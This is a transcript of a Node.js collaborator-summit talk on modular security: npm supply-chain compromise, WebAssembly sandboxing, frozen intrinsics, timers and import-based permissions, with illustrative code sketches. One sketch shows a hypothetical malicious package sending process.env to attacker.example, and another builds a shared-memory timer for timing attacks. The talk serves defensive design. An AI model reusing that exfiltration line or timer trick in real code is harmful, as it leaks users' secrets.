Right, so this session's on security models and Node.js and I want to just give a brief introduction to the topic. Can you all hear me okay? Is that alright? To the back? Good. Brief introduction and then hopefully a discussion, if people are interested, have thoughts. If we've got any security experts here, please poke holes in what we're suggesting here. Yeah, so if you don't know me, my name is Guy Bedford and I've been involved quite a bit in the modules working group. I should probably set up the Zoom chat so we can actually get participants. Sorry, do you know what the meeting ID is for this? 3642? 3642, yep. Do not connect audio, because audio is coming from here. Yeah, otherwise you will feed back. There you go, yeah. Great, okay. So we should be live. All right. Can you share your screen to the Zoom in the center? Yeah. Sure. Got it. OK, great. Yeah, good. So for those of you who are just joining us online, I was just saying that working on the integration of ES modules in Node.js has quite a few touch points with the security of Node.js. So as we ship ES modules, all the decisions we're making around ES modules are affecting the security of Node.js in the future. And the other thing is that WebAssembly has its own security model, which, as we integrate WebAssembly into Node, also affects Node.js. So Node.js is surrounded by a lot of interesting things going on at the moment. And in particular, security is a huge area; there is so much that can be discussed. The problem that I'm focusing on here is very specifically the problem of running untrusted code from node modules, and thinking about whether there are things that we can do about that. And this is all very, very much long-term thinking. So I'm not suggesting changing Node today, I'm suggesting just thinking about the longer term of the project and the longer-term security positioning of the project, and whether there are small tweaks we can do today and think about today to sort of plan for the future. In particular, I have a PR up, and this is actually what started the motivation for the session: a pull request to remove global.process, which is currently available in all modules, but to remove it just for ES modules. And currently, Matteo is the blocker on that. So this entire session is to get Matteo to push that through. Thank you, Matteo. The inspiration here is almost entirely from the SES project, the Secure ECMAScript project, and this is the problem of maybe tackling running third-party JavaScript without security risks. So everything I'm talking about, you can basically get exactly the same things from this talk that Mark Miller gave to TC39 called Extremely Modular Distributed JavaScript, and I would strongly recommend noting down that YouTube link and watching it, because it's a very interesting talk about this topic. And one of the key insights there is that JavaScript is very, very close to having some very, very strong security properties. It has no security properties right now, but it's very close to having some incredibly strong security properties. And so there are some ways we can maybe nudge it in those directions. And the other thing about it is Mark Miller mentions this as being surprising in comparison to other languages that you'd consider maybe technically superior. So this is the example of what we're looking at, the type of attacks that are possible.
This was an example earlier in the year where you've got a deep dependency of a dependency of a dependency of a widely installed package that maybe isn't maintained that well. Someone ends up maintaining it or getting the rights to publish for that package, and in this case it was the getcookies package, and they were able to publish a backdoor into the node modules. And then anyone who's running upgrades of their dependencies without a lock file is potentially getting this backdoor. And because it was a cookie processor, it could actually take commands that would allow remote execution and things like that. So you've gone from not knowing that you were using this package and that this person had access to your application, to them having full read access and being able to have full control and the ability to do anything they want. And this is the model for a security talk: scare people about the problems and then dive into the solutions. Right, so the threat scenario is you have all these maintainers you depend on at any given time. Someone could get access to one of them, push out a patch, you install the patch without knowing it, and now you've been compromised. And because the security model of Node.js is so permissive, any package can do anything. That cookie parser has full read access to the file system. So the maintainer of that cookie parser can push up code. And then what happens is, when this gets discovered, we have the security process that kicks in, and we've made incredible strides in getting to a position where security audits are now completely widespread. And that's amazing, how that process has been built. It means that there's a very, very short window before a vulnerability gets discovered. But the problem with security auditing is it can only deal with security vulnerabilities that are known about. And there is still that case of: what about the sort of maintainer that's been compromised? There's that small window of time where they're able to push up damaging code, and there's nothing you can really do about that. And we're especially vulnerable because in the Node.js ecosystem we depend on a lot of maintainers, and it's not going away, it's growing over time. We might have third-party code we're using, and we update incredibly fast as well. And with tools like Dependabot you're updating patches all the time. And that's great, because on the one hand you're patching vulnerabilities that are being discovered, but it also means it's very easy to very quickly have one of those maintainers you don't even know you're relying on push up something that's malicious, and for it to propagate very fast before it's eventually caught and mitigated. So it's this kind of... it's this node modules time bomb of all of these vulnerabilities out there. So I'll try and stop harping on it now. But the idea is: can we not somehow restrict those permissions so that it's not as bad as it is? There are install scripts as well, which you're not mentioning here. Thank you, that makes things 100 times worse as well. Yes, that was... yes. So we should stop install scripts, and we should just run the install scripts that need to build binaries, and do it in ways that don't... Yeah, okay. Sorry, I just want to... No, no, it's worse than I've been saying. If you try and speak to anyone about securing JavaScript, or securing JavaScript as it works today, they'll very quickly...
The general assumption is that's just not possible, because that's not how JavaScript works. The language has too many security holes and we can't patch them. And the only security model for JavaScript is per-process isolation, per-process sandboxing. That's what the browser does, that's what V8 and Chrome do, and that's the only security model. And to try and fix individual things, like that PR that I've got up to remove global.process, you're just plugging one small leak of a huge problem, so don't even bother. And that's before you even get into all this Meltdown and Spectre stuff, where we have these CPU hacks where even if you plug all those same-process issues, it's still possible for there to be same-process vulnerabilities in the CPU itself. So once we solve the language, we've still got the problems of the CPU architectures. So the counter-counter-argument is: Node.js is not a browser. We shouldn't take our security advice from the browser environments. Node.js has very different security properties, and it's really not an option for us in Node.js to adopt per-process sandboxing. The way that we've written our code sharing in the language — if we just sort of bolt on some kind of sandboxing around that, it's gonna break a lot of features, and the way that things already behave is they're expected to be able to share the same bindings and the same function instances. So it's not necessarily something we can just add on. So then the question is, well, are we just left with security auditing? And we kind of have this process where we know that any malicious maintainer could come in, or socially engineer their way into a project, or steal the private keys of a maintainer. And when that happens, it's just kind of a process where we all have to very quickly respond to it, and that's just the way things are. And we just sort of accept this kind of sacrifice every now and then, that a few people are gonna get hacked from time to time, and that's just the way things are. And so the response to those arguments about trying to get perfect security is: what can we do to mitigate those risks? So to reduce those risks — not perfectly solve them, not create an ecosystem where everything is perfectly secure — but what can we do to make sure that, as much as possible, we reduce that risk, which right now is quite high, because any of the hundreds of maintainers that have access to my app can get full read access. So it's not a black and white issue; there will always be some attack surface, some minimum chance that you can be hacked. So you can think of this critical attack probability as something like: how many maintainers have publish access into your upgrade path, times the average security standards of those maintainers — so do they use two-factor authentication, how susceptible are they to spoofing or other types of hacking attacks? Ideally, npm by default would use 2FA, and I don't know if it really does, but that would be a huge one to reduce this overall probability. And then the third thing that factors into this probability... One thing that you might want to raise with npm — and I don't know if that's feasible — is whether, as part of the install data from the registry, it gives us the information that the publisher has 2FA enabled, and that's probably valuable in this context. Sorry, I can move my head. Oh, that's a very good point, that you could have some kind of, like, upgrade double-dash secure. So essentially you can check what your attack points can be.
Essentially it's not a solution, but at least you know you have data to measure that, and right now we don't. So you can say, I only want to get patch updates from... Yeah, or none, or zero — I want to manually update and check. That's the great thing. Because that way you can drive the 2FA adoption as a user, as opposed to expecting it to be some kind of global thing that's centrally maintained. Yeah. Okay, that's a great point. Yeah, and then the third factor that comes into this attack probability is, if that maintainer does get hacked and we know that they're able to upgrade our packages, how much capability those maintainers have, if they wanted to, to get access to our systems. And at the moment that's one — any maintainer gets full access. The question is, can we possibly think of a way, or an ecosystem in future, where we could reduce that down so that on average it's less than one. And that's what we can mitigate. So if we can just start reducing capabilities over time and reduce the permissions that we give, we could possibly start to mitigate this overall probability. And then the other thing is, we don't want to just reduce this probability by reducing the number of maintainers we rely on. We don't want to retreat into some kind of walled garden where we think open source isn't secure and we're just going to rely on our own company code or something like that. We want to encourage these healthy ecosystems where we can safely share code. And so if we can focus on these other two factors, then we can compensate for the security risk. So I'm just going to take a step back and speak about the security model a little bit in WebAssembly. Here's an example of running WebAssembly through ES modules in Node.js today. That main should probably be a main.mjs, or I could have a package.json with a type module in the local folder. And in this example, I'm loading, say, a JavaScript parser that's in a third-party module that I've installed, and I'm loading it from a Wasm file. So I'm loading its memory, which is just a buffer, and its parse function. And at the bottom there, I am running the parser: I'm writing a string into the buffer and then parsing it and getting a pointer into the data structure in memory or something. It's a very rudimentary and bad example, just showing the sort of minimum WebAssembly interfaces we have today. But what this demonstrates is the security model, and there are two factors to it. The one thing is having information be compromised: say, for example, we've got some information we don't want that third-party module to be able to discover — the highly coveted shrug emoji. And then we also have a function here that we don't want to be run by our third-party module. So this function represents a capability, the nuclear launch function, where you don't want the third-party code to be able to call that function. So do we know that we can safely load this third-party code, this third-party WebAssembly code, without either exposing the secrets or exposing the ability to call these protected functions? Here's what might be inside that WebAssembly module: it defines its memory, it defines its parse function, and then it exports them. And the amazing thing about WebAssembly is if we know that that module has no imports.
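A rough reconstruction of the kind of slide code being described — the package name, the secret, and the launchNukes function are all made up for illustration, and it assumes the experimental flags Node has used for Wasm ES module integration:

```js
// main.mjs — a rough sketch; assumes Node's experimental WebAssembly module
// integration (e.g. --experimental-modules --experimental-wasm-modules);
// the package and file names are invented.
import { memory, parse } from 'some-wasm-parser/parser.wasm';

// Sensitive information we don't want the third-party parser to discover.
const secret = '¯\\_(ツ)_/¯';

// A protected capability we don't want the third-party parser to be able to call.
function launchNukes () {
  throw new Error('should never be reachable from the parser');
}

// Run the parser: write a string into its memory buffer, call parse,
// and get back a pointer into its data structures.
const source = 'const x = 42;';
const bytes = new TextEncoder().encode(source);
new Uint8Array(memory.buffer).set(bytes, 0);
const astPtr = parse(0, bytes.length);
console.log('AST at offset', astPtr);

// Because the Wasm module declares no imports, nothing inside parse()
// can ever reach `secret` or `launchNukes` — its only view of the world
// is its own exported memory.
```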
So if we know for a fact that this WebAssembly module itself isn't able to import anything else from our file system, or the module system, then we don't care what code is in this parsing function. It could be downloaded from the, like, dodgiest site on the internet. It doesn't matter what's in that function, because it won't be able to get access to secret information or the function capabilities we have in our other module. And so WebAssembly is a secure sandbox, down to the imports it is given. And if we can control which imports are available, then we can run unknown third-party WebAssembly code in the same process with zero risk. And even with Meltdown and Spectre, we don't have that problem either, because Meltdown and Spectre are timing attacks. They need access to timers in the environment, and in this code example, the WebAssembly code has no access to a timer. It can't access any timing functions, so it can't do any reverse engineering of the CPU cache to try and discover sensitive information. So this is also a demonstration of POLA, the principle of least authority: the module only has as much access as it needs to do its job. An AST parser doesn't need root access to the file system. Yeah, I don't know anything about WebAssembly — do you say WebAssembly doesn't have access to JavaScript builtins like Object? So yeah, it doesn't have any global object like JavaScript does, so it won't have access to anything like that. So it can't construct an object and access the .prototype and look at it? Exactly. Unlike pretty much every other programming language that anybody here has used. And that's exactly the next thing I'm gonna get to. So what about JavaScript? Well, JavaScript has all of these exact same security properties that WebAssembly has — and this is what we mean when we say it's very close to having these strong security properties — except for four things. One, we have global capabilities: we have global.process, and if we implement fetch like the browser does, we have a global fetch. Two, we have mutable globals and mutable intrinsics, so you can override Object.prototype, you can add things to the global, you can read sensitive information off the global. Three, we have access to timers. And four, we have unrestricted access to imports. So I'm just gonna go through these in a little bit more detail. Global capabilities: on process, you have a whole bunch of sensitive information. process.env is probably gonna have some security tokens on it. You can read standard in. So these are all things that can contain sensitive private information that you don't want leaking out. And if we have a global fetch — well, in this example, I've got like a JavaScript parser, and then underneath it can just have a whole bunch of code that steals secrets out of the process environment. It can take all of those from the globals, and if we have a fetch global, it'll be able to share those secrets with a third-party server. And this is one of the arguments for why we probably don't want a fetch global in Node.js — and I would argue strongly against a fetch global in Node.js — because it makes this global capability available to all third-party packages, which, if we don't have it, then those packages don't have the ability to share these secrets anymore. We've also got dlopen: you can open any Node native binary to get full access to native interfaces.
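To make that process-plus-fetch point concrete, here's a hedged sketch of what a compromised package could do if both the process global and a fetch global were available to it — the package name and attacker URL are invented:

```js
// node_modules/innocent-parser/index.js — hypothetical compromised package
export function parse (source) {
  // ...the legitimate parsing work the package advertises...
  return { type: 'Program', body: [] };
}

// Nothing stops module-level code from also running this when the package loads:
// the process global exposes the secrets, and a fetch global would provide
// the exfiltration channel in the same breath.
if (typeof fetch === 'function') {
  fetch('https://attacker.example/collect', {
    method: 'POST',
    body: JSON.stringify(process.env)
  }).catch(() => { /* swallow errors so nothing is noticed */ });
}
```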
And we've got process.hrtime, which is ideal for doing the Meltdown and Spectre timing attacks, because you don't even have to construct a timer anymore to do those attacks — you've got this perfect CPU timer that you can use to do the timing. The other thing is these mutable globals and mutable intrinsics. You could have a third-party package that overrides JSON.stringify, and now you're using JSON.stringify in your app and it's behaving the same, but in the meantime it could be stealing all the information that's running through JSON.stringify and then sending it off to a third-party server. Object.prototype.toString can be overwritten to do the same thing — it has the this binding — so just by calling toString on an object, without realizing it, you've exposed that object itself to some third-party code. And so these traps in JavaScript allow third-party code to intercept objects that you thought were only within your own application code. And here's another example of ways in which you can inject into intrinsics. This one's a little bit more convoluted, but say, for example, you have a walk function that takes objects of two types. It's either type A or type B, and the one type has a children property and the other type doesn't, and you check which type you've got by checking if you can do that property access and whether it returns undefined. But that property access to .children is gonna go all the way up the prototype chain of the object. So if some malicious code had defined children on Object.prototype, it's got a trap and it can also steal that object. And in this example these are not just plain objects, they're classes, and you could potentially have functions or capabilities on these objects as well that are being made available. So these are the ways in which we're leaking these security properties. Any questions on that? Matteo? So there is overhead in the context of the globals, okay — and intrinsics, sorry, and primordials, which you haven't talked about too much yet, but it's probably relevant. The way we're tracking primordials in Node introduces some performance overhead, and accessing globals directly is faster to some extent, and adding a level of protection on accessing those things adds overhead — that's my main blocker on your PR, it's performance, right? So I just want to flag that it's not just about security; there are also other cross-cutting concerns, so it's a very... Can you clarify what your performance concern is? So I've recently been doing some work on EventEmitter, and EventEmitter, if you don't know the internals, uses Reflect.apply, and we get that Reflect.apply from our primordials, blah, blah, blah, from the Reflect object. However, accessing it through Reflect.apply as we are doing, versus doing const apply equals Reflect.apply at the top of the file and then just using that instead, gives us an 80% performance improvement on our microbenchmarks. So, yeah, sorry, I'll just... so I'm just flagging it as a theme. But how does that relate to this? It relates because, you know, the problem with the globals and the way you're doing the global stuff, the way you want to... You're referring to the PR and the technique used in that? Yeah, yeah, yeah. So what I'm referring to is on the...
If granting security on those types of global things needs to not have an impact on performance — and those are two different, sometimes conflicting, directions. So to be very clear, it's global.process — there is nothing else that I'm proposing changing — and that behavior of global.process does cause... So I've created a PR saying, well, these globals — it's this example where we've got all these things on process in the global scope — and I'm saying we should deprecate process so that it's no longer possible for people to read authentication tokens or the process environment in any JavaScript environment, but we're only deprecating process in ES modules. And the way that I constructed that deprecation was to have a getter for process on the global object, and you're saying that getter itself is a performance degradation for CommonJS, and we also need to bear that in mind. Right, yeah, that is my... So I just wanted to flag it is not just about security, okay, there are different levels of concerns and cross-cutting concerns here. So we'll go back to that conversation again. The other thing I want to say, on the fetch thing: yes, please — having fetch as a global is a very good thing. We can come back to that in the fetch session later that we talked about. Well, it's actually now. Okay. We've got 25 minutes. Can we? Yeah, this is an hour. Okay, right. I'm sorry, thank you very much, I misread the schedule. You have lots of time. Never mind. Yeah, you're making me panic there. Right. So what we've got now to mitigate these problems of the globals and the intrinsics is a frozen intrinsics flag that landed in Node 11.12. And what this does is it goes through all these objects like JSON, Object, Object.prototype — all of the intrinsics that are available, anything that's on the global object normally — and it freezes them, so that if you try to do any of these lines of code in strict mode, you'll get an error if you try to override these defaults. And what we're doing is seeing whether those who are interested in exploring these security properties want to see if they can enable modular permissions — this is absolutely critical to that — but it's opt-in. So we're not changing the default experience in Node; you can opt into it. And then third-party packages will likely hit cases where their code runs up against this flag, and that's where we want to get feedback and see how people are using this, and potentially get ecosystem PRs that fix up any cases where it breaks, or where there are problems integrating this change of behavior — which is quite a big change of behavior. If you think back in the day, we had things like the Prototype library that was entirely built off the concept of overriding native prototypes in the browser. It's quite a big change to think of these things as frozen. But this is critical to getting security properties in JavaScript, if we want them. And let's see how far we can get in executing node modules under this flag. If anyone is using this or interested in exploring it further, please do chat to me or anyone else involved in this work. The edge cases: there are scenarios like setting toString on objects that don't have it to begin with. And these are the sort of subtle bugs that can happen, and the cases we need to find out about when they happen.
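A small sketch of what the flag means in practice — run under something like `node --frozen-intrinsics` (experimental), with strict-mode code; the `children` getter and the "leak" are hypothetical attacks:

```js
'use strict';

// Installing a prototype trap now throws instead of silently succeeding:
try {
  Object.defineProperty(Object.prototype, 'children', {
    get () { /* would capture `this` for the attacker */ }
  });
} catch (err) {
  console.log('blocked:', err.message);
}

// Overriding an intrinsic is blocked too:
try {
  JSON.stringify = (value) => value; // imagine this also leaked `value` somewhere
} catch (err) {
  console.log('blocked:', err.message);
}

// The subtle breakage case: in strict mode, assigning over a non-writable
// inherited property throws (the "override mistake"), so innocent-looking
// code like this breaks under the flag:
try {
  const obj = {};
  obj.toString = () => 'custom';
} catch (err) {
  console.log('subtle breakage:', err.message);
}
// Object.defineProperty(obj, 'toString', { value: () => 'custom' }) still works.
```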
On the one hand, it's regarded as a spec bug that you can't assign any of the Object methods on an object when Object.prototype is frozen, and you need to make sure they're defined upfront. But these are the sort of bugs that you hit. Hopefully they're fairly minor, because Object.prototype doesn't have many properties on it. The third thing is timers. And unfortunately, we can never deprecate Date.now in JavaScript — in Node.js it's pretty far integrated into the ecosystem. Maybe we could make some progress on that, but we just have to accept that we have access to timers, which means we have Meltdown and Spectre attacks. And so we just have to assume that it will be possible for these sorts of reverse-engineering attacks on the CPU to take place, and that sensitive information in the same process can be read. So if you've got a token — a secure token or secure information or organizational information — that's running in the same application, just like the WebAssembly example that I showed at the beginning, if you're in JavaScript, you have to assume that there exists an attack that'll be able to discover that information in a module running in the same process. And even though there are hardware mitigations coming through for these attacks, they're a class of attack, and I don't think we can consider them solved in any way, shape or form yet. Please update me if anyone knows more. Yes? Yes, if you're on separate processes — I mean, I'm sure there's a... To be honest, I don't know if they do extend to those attacks. I mean... Till? They don't. We trust the browser security teams, I guess, and they tell us that it's safe to have different processes, so we can... If you wrote something in C, would you be able to get the context of your JavaScript process? Of a different JavaScript process? Yeah. Okay. I was going to ask about workers. Can it be fixed in terms of workers? It wouldn't change how the ecosystem works now. If a worker is running in the same process, then it's still susceptible to attack. Really? And are we not considering modular permissions for workers, if they turn off timers or something like that? Well, as you mentioned, in the case of Date.now you cannot do that. Yeah, maybe we could add a flag to Node to disable Date.now, but I'm not optimistic about that working in the ecosystem — I just think it'll break too much. Already this frozen intrinsics one is a tough one, and it'll take a lot of collective effort to be able to support the ecosystem and PR the ecosystem to support it. Date.now is even more drastic. But yeah, on workers, I'll talk about that. That's one of the reasons why I want to separate out global.process, because that's where hrtime lives. It's harder to construct a high-resolution timer with Date.now, but I believe it is possible — there are various subtle techniques. But yeah, process.hrtime is not something we need on the global for that. You can't stop people trying to build timers like this. So, but the key thing I want to mention here is: just because you can discover a secret doesn't mean you're stealing it. To complete the act of stealing a secret means being able to propagate that information to another server. So you need to have the timer capabilities — which maybe let's give up on — but then you also need to have the capability to share that secret.
So even if you're running code in the same process that in theory could be discovering your internal authentication tokens and things, it can only be considered insecure if it is also then able to share that information with a third party. If that code is in a sandbox where it doesn't have the ability to escape the sandbox, then it can't share the secret. So was the secret really stolen, is the point. So this is the capability to exfiltrate. And if we move the focus for JavaScript away from the capability for timers — accept that we've lost that war — and rather move it to focusing on the capabilities for exfiltration, then that could be a way that we still maintain strong security models, by making sure that secrets can't get out and be stolen. So this means protecting your side channels: things like HTTP, fetch, any other ability to touch the network, any way that you're getting out of that sandbox. And we need to think about that capability in terms of a permission that we're managing. Yes? Sorry, you were waiting a while there. No worries. So I just spent time with Atomics and shared buffers, just writing spec tests, and I learned about this concept during that, which I had like zero exposure to, called monotonic time. And, you know, fascinating, but I was just curious: we were able to kind of expose, in our test execution runtime, a way to use monotonic time to kind of verify that things happen exactly when we expected them to happen. And so I was just curious if there was any way to expose that lower-level primitive to kind of get around the Date... To get around issues with Date.now. Right. So, yeah, that's the third way to construct a timer, with shared memory. You can kind of have something that runs in a separate thread that's always incrementing a single memory location, and you can sort of form a timing mechanism. So access to shared memory in WebAssembly and JavaScript should be regarded as a timer mechanism. Ideally, for WebAssembly, if we want to be secure against those kinds of secret-stealing attacks, we would want to restrict access to shared memory and then treat it as a permission, because we don't have that timer problem in WebAssembly like we do in JavaScript. But in JavaScript, because we have time, it's there — unless we can get rid of Date.now, that's it really. So the fact that there might be ways to use shared memory to construct timers is, yeah, it could be another way of getting time out of it. So, sure, there are many sources of time. Yes, James. So one of the things that I started to look at was with workers. Right now when you spin them up, they're given a full copy of the environment — they have access to process and everything else. I'm looking at a lightweight worker that doesn't have that. It can only run the code that it's given at the start; it won't have access to require, it won't have access to... here's a bunch of code to run. So hopefully, looking at it, it won't solve the Date.now issue or the access to shared memory, but hopefully it will give a little bit of a better story there. I'm very hopeful for module workers, when we get to them, to be based on a similar model. So, yeah, we need to have a secure concept of this capability to exfiltrate a secret, to send it back off to a malicious server or something like that. As long as we can control that access, we can control the secret information.
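To illustrate why shared memory has to be treated as a timer capability, here's a rough sketch of the counter trick being described, using worker_threads and a SharedArrayBuffer (the operation being timed is just a placeholder):

```js
// shared-memory-timer.mjs — sketch only
import { Worker } from 'worker_threads';

const sab = new SharedArrayBuffer(4);
const counter = new Int32Array(sab);

// A thread that does nothing but increment one shared memory location forever.
const worker = new Worker(
  `const { workerData } = require('worker_threads');
   const counter = new Int32Array(workerData);
   while (true) Atomics.add(counter, 0, 1);`,
  { eval: true, workerData: sab }
);

// The main thread never touches Date.now or process.hrtime, yet reading the
// counter before and after an operation gives a relative high-resolution clock —
// which is all a cache-timing attack needs.
const before = Atomics.load(counter, 0);
somethingWeWantToTime(); // placeholder for the operation being measured
const after = Atomics.load(counter, 0);
console.log('elapsed ticks:', after - before);

worker.terminate();

function somethingWeWantToTime () { /* ... */ }
```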
And then the thing to watch out for is what's called covert side channels. So, side channels that we didn't even know we had. Say, for example, you're rendering some HTML and your HTML renderer gets hacked and now it's spitting out secret information for the hacker in invisible HTML or something — it's a side channel that you didn't intend to exist. These are the sort of things that we will still rely on security audits for, but the difference with covert side channels is that where they're not expected to exist, they can typically be treated as security bugs. There are still going to be vulnerabilities; I'm not saying this is a cure-all. So the first thing is, the ways that you get bindings in a module: you've got the globals, we've got the intrinsics, we've got the timers, and then the way that you access the outside world at that point is through imports. So if you think of imports as a kind of capability: when you import readFile from fs, you're asking for the ability to read files. As a capability, you're asking for the permission to read files. And actually, at the resolver level we can have a security model, because you could just throw on an import of fs and say no, you're not allowed to import fs. So if we treat imports in JavaScript as capabilities, then we're getting something similar to that Wasm security model, where we've now turned modules individually into secure sandboxes and we can control the network capabilities. We know that secrets can't get out, organizational secrets can't get out — even if those packages and modules are completely hacked, they won't necessarily have access to these things. So I want to just go through, very briefly, the Deno and WASI security models. Deno does something like this: you run a server, and as soon as you run that server you get a question that says this app is requesting network access, do you want to grant it? You've got a few options, and only once you accept that does the server start and touch the network, and then later on it requests read access to a file and you have to grant that read access as well. My concern with that is it assumes that the user is around to interact with the process — and what if they're not? Is your server just hanging there the whole time? So I'm not so sure about that. There is another way to grant these permissions on startup, through flags, which seems better, but again this is whole-application permissions. So that's great if you're running an application that you know is just going to take in text and spit out text, but as soon as you've got any interesting application, it's probably going to have a lot of permissions, and then you've got that third-party code problem: any third-party code is going to have the same permissions. So in this example, if you're running third-party code, it also has the ability to talk to that server.
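As a sketch of that resolver-level idea mentioned above — using the shape of Node's experimental loader hooks, whose names and signatures have changed across versions, and a made-up rule about which modules count as "our own" code:

```js
// deny-fs-loader.mjs — sketch; run with something like:
//   node --experimental-loader ./deny-fs-loader.mjs app.mjs
// (the hook shape here is the newer experimental one and may differ per Node version)

// Hypothetical policy: only modules under our own src/ directory may import 'fs'.
const FS_ALLOWED_FROM = /\/src\//;

export async function resolve (specifier, context, nextResolve) {
  if (specifier === 'fs' || specifier === 'node:fs') {
    const parent = context.parentURL || '';
    if (!FS_ALLOWED_FROM.test(parent)) {
      throw new Error(`'fs' import denied for ${parent || 'unknown module'}`);
    }
  }
  return nextResolve(specifier, context);
}
```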
WASI has a really interesting capabilities model, where when you run the process you have to specify explicitly which directories it is given access to, and once those directories are given access, the idea is that you have these special references that represent those directories — in this example the pwd_fd and temp_fd — which, I think, the ultimate goal is to treat like references. So in JavaScript you could think of them like symbols that ideally wouldn't be forgeable. I think right now they actually are forgeable, but I think the plan is for them not to be. So for example, when you load a file you say, here's my special symbol for this folder, the temp folder that I got access to, and the only way you can get access to that symbol — well, symbols you can only get access to if you're given the symbol — so if you don't have the symbol, you don't have access. So you can't just forge a string and make it up; you have to get access to that symbol, and then you have access to load relative to that folder. So it's really nice because it's this model of access by binding: if you've got access to the binding, or someone else has given you access to the binding, you've got the folder, and these are unique unforgeable references. So the principles are, as I said: I'm not at all suggesting changing the default experience in Node.js, not suggesting that we change the way we do things today, not suggesting that Node.js overnight implements a capabilities-based security model. Rather, the question is: we have Node.js as a project, it is the steering force of JavaScript that does not run in the browser — and of JavaScript in the browser, for that matter — can we use our power to try and steer this ecosystem in a beneficial direction? And for those companies, for those organizations that are interested in getting these security properties, which a lot of companies are interested in, what can we do as a project to help start to move in those directions, so that instead of having to say Node is not secure, we're going to go and do our own project or something, what can we do to try and provide the properties through Node itself, and unlock that work, allow that work to happen on top of Node — not go right into core, but just on top, in userland — and just unlock it. Well, we can already do import permissions through loaders. Loaders give the ability to hook the resolver, which means you can provide a custom fs instance for every module — every package can get its own fs with its own scoped permissions. Or we could do something like WASI's capability model where you're passing references in, but that's a bit more drastic. The idea is you could wrap these APIs up through a loader in userland, and you would be able to get these import-based security properties that can restrict permissions: this package only has permission to the network, but it doesn't have permission to the file system, it doesn't get fs, and you could just restrict it. And this is a huge wide-open space to explore, but if we can start exploring it in userland, I think it would be very interesting to see where things can go. Here's a sort of complete bikeshed of some ideas — again, this is literally just like jotting down notes and it's terrible — but if you can control the imports of a package, you could say the local project can only import fs and some third-party package, that third-party package only has read access to the current folder, and another third-party package is not permitted any imports. And you could probably restrict imports by just saying packages are only allowed to import what they
explicitly declare as dependencies in their package.json. So there's a whole lot of problems to think about with this stuff, but I think it would be worthwhile for us to think about new work that can be built in userland that prototypes this stuff. Is there a place where all those ideas are actually written down, so people can contribute to it? I don't think so — do you know a place where they are? No, I'm not sure I've seen that. A few people have suggested things like this, so I think someone suggested a package or a schema for this kind of stuff, but I'm hoping that we can get places together where we can discuss it, because now is the time to be experimenting, so that we can start to grow these models out. Given that we already have the loader argument, there could be an easy open-source project that implements all these ideas in userland. So the idea is: restrict imports to maybe only what's in the dependencies of the package.json — so you treat the package.json dependencies as a way of saying I only import these packages — and then maybe think about what core permissions you have. And then I was thinking about package-management time: so as you install a package you verify the permissions then, as opposed to during runtime like Deno, where you could say, I can see what these packages are depending on, with a policy file that's treated like a lock file, where you sort of know what each package is accessing, so that if it tries to change its security policy on an upgrade path, then you can be prompted for it on install, and re-prompted again. There are huge usability spaces here — lots of space to make horrible complicated things that are painful to use — but that's why we should be exploring and prototyping and seeing what ideas we can come up with in these spaces. Again, maybe install time is not the right time, but I kind of like the idea of install-time permissions. I don't know, but we should be having these discussions. So to summarize: if we can deprecate — Matteo — global.process, and not implement further global capabilities, then if you and your company want security, you can execute under frozen intrinsics and a frozen global. If we accept that we've lost the war on timers, and just focus on the ability for secrets not to get out — and assume that people are going to be able to use Meltdown and Spectre to discover them — then we can play around with import and permission models on top of that, and that gives us a comprehensive story on security. So that's a complete picture; that's plugging all the leaks — and please, if you can see another leak, let me know — but coming from the direction of the work that Agoric are doing, that is the complete picture of modular security. So that's what I mean by being very close to these strong security properties: because you can't access anything else outside the module, and then you get package security models. So just as an example of what's meant: how does this mitigate the node modules risk? Well, right now we have this situation where every dependency in your app has full access to everything. Instead, we can potentially get a model where those permissions are reduced. And in this example, the first dependency only has access to fetch, which means yes, it could possibly steal organizational secrets if it is hacked, or if any maintainer of that dependency is hacked. Dep 2 no longer has any permissions, because it's just a parser and it doesn't need to access anything, so I don't care if it's hacked — if it gets hacked it can't damage my server, it can't damage my company. Dep 3 only has access to read from the local folder
so if it gets hacked, yes, it can read sensitive information, but it doesn't have network access or any other side channel, so it can't exfiltrate those secrets — so I don't actually care if dep 3 gets hacked. If dep 4 gets hacked, it's got access to fetch and to read, so that is a worrying one, because it can share organizational secrets. And dep 5 has write access, so that can probably become a full-blown backdoor situation. But we've gone from having five dependencies that immediately give full access if they were hacked, to just having one dependency that leads to a full backdoor and two dependencies that lead to the possible loss of sensitive information. And that's the idea of a reduced attack surface and mitigating that risk, because we've reduced the risk. It's a lot of work to get a small improvement, but the idea is, if we can have lots of dependencies looking like dep 2 and dep 3 there, then we can get a very secure application model. And to reiterate what I said at the beginning: this is not about adding these kinds of features today. It's about saying let's enable these things and then experiment in userland, and see if we can get there without having to say, if you want to secure JavaScript you've got to fork the ecosystem, you've got to fork the project. Let's experiment on top of loaders to do these things and work towards it in a long-term future — this is very much many years out, as opposed to being something that happens tomorrow. So no longer is every package a target: you've only got a few packages that have high permissions, and the hope is as well that those maintainers know it, so they can be more careful and know that they have a very privileged position. Yes? I have possibly another... Thanks, go for it. No, that's it — I'll just do my last slide and then let's skip to the discussion. Okay, was it another type of attack, Rohan? No, no, it's a separate thing, I'm just flagging it. Okay. My concern here is, first of all, I agree with all of what you said, okay. Mine is the fact that we cannot afford at this point in time to reduce the throughput of Node in any form, and unfortunately the process global sits on several very, very hot paths, in both Node core and in applications, via process.nextTick. We're talking about a... do you remember what the numbers were? Yeah, I don't remember exactly — this was on a microbenchmark that was just doing process access, and it did slow down by maybe, I think, a few percent. Still, that microbenchmark is there because that is the hottest path — process.nextTick is used everywhere — and that's kind of the problem, that's what I'm flagging. Can we come back around and finish my last slide first?
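For context on that performance point, a rough sketch of the shape of the deprecation being discussed (not the actual PR): the plain process global becomes an accessor, so hot paths like process.nextTick now go through a getter on every access:

```js
// Illustrative only — roughly the shape of deprecating the process global.
const realProcess = process;
let warned = false;

Object.defineProperty(globalThis, 'process', {
  configurable: true,
  get () {
    if (!warned) {
      warned = true;
      realProcess.emitWarning(
        'the process global is deprecated; import it from "process" instead',
        'DeprecationWarning'
      );
    }
    return realProcess;
  }
});

// Every access now pays for the getter call, which is the throughput concern:
process.nextTick(() => {});
```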
